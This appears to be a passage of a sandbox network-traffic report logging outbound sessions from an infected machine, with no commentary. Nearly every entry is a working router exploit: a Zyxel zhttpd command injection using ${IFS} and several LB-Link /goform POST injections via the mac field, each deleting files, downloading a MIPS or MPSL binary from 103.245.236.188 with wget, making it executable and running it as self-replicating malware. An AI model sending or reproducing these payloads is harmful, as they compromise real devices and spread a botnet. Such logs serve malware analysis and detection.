                                    Jan 13, 2024 19:02:47.492655039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7887192.168.2.133314267.53.89.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.496895075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7888192.168.2.1338580191.61.142.1748080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.641199112 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:48.367913008 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:49.775907040 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7889192.168.2.1339546124.167.184.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.505747080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7890192.168.2.1344470135.96.219.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.505775928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7891192.168.2.135438257.141.222.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.505808115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7892192.168.2.1335690192.192.13.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.505865097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7893192.168.2.1347802201.93.39.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.505897999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7894192.168.2.1353990203.82.142.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.505949974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7895192.168.2.136093659.221.206.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.505994081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7896192.168.2.135933671.31.2.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506051064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7897192.168.2.134135060.41.17.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506062031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7898192.168.2.133750260.182.62.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506088972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7899192.168.2.1352368193.180.191.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506160021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7900192.168.2.1344068172.159.92.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506182909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7901192.168.2.1344690154.78.40.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506231070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7902192.168.2.133657683.43.39.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506282091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7903192.168.2.135403643.184.28.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506319046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7904192.168.2.1341812142.122.204.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506342888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7905192.168.2.134950466.77.123.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506355047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7906192.168.2.134041282.137.186.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506411076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7907192.168.2.13582344.231.133.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506479025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7908192.168.2.1359644216.129.78.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506529093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7909192.168.2.1339850223.248.45.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506592035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7910192.168.2.1333180200.117.200.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506623983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7911192.168.2.134043457.67.182.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506659985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7912192.168.2.1354652146.212.68.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506706953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7913192.168.2.133663613.222.31.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506762028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7914192.168.2.133660865.73.35.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506817102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7915192.168.2.134201034.239.58.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506871939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7916192.168.2.1347400137.131.86.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506913900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7917192.168.2.135099250.206.149.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506938934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7918192.168.2.1336738113.235.7.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.506975889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7919192.168.2.1341472194.33.247.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507019997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7920192.168.2.134727447.97.167.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507071018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7921192.168.2.1338940147.31.37.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507116079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7922192.168.2.1344264167.251.246.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507162094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7923192.168.2.1346722176.239.248.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507201910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7924192.168.2.1336462146.112.65.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507251978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7925192.168.2.135157885.212.94.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507287979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7926192.168.2.1349030120.18.183.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507349968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7927192.168.2.1347998213.49.230.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507394075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7928192.168.2.136068047.195.234.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507420063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7929192.168.2.1359618191.105.160.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507482052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7930192.168.2.1336900121.13.137.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507539034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7931192.168.2.1333064107.246.20.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507594109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7932192.168.2.1356434134.220.167.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507600069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7933192.168.2.136082078.203.233.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507635117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7934192.168.2.1336860191.134.127.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507688999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7935192.168.2.1347520200.21.110.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507750034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7936192.168.2.1356210118.225.69.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507781982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7937192.168.2.1345976166.104.206.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507822990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7938192.168.2.1340108221.8.46.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507917881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7939192.168.2.1333032129.88.132.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507920027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7940192.168.2.133667485.59.198.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.507958889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7941192.168.2.133786853.24.32.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.508045912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7942192.168.2.1360606206.131.59.70443
                                    TimestampBytes transferredDirectionData
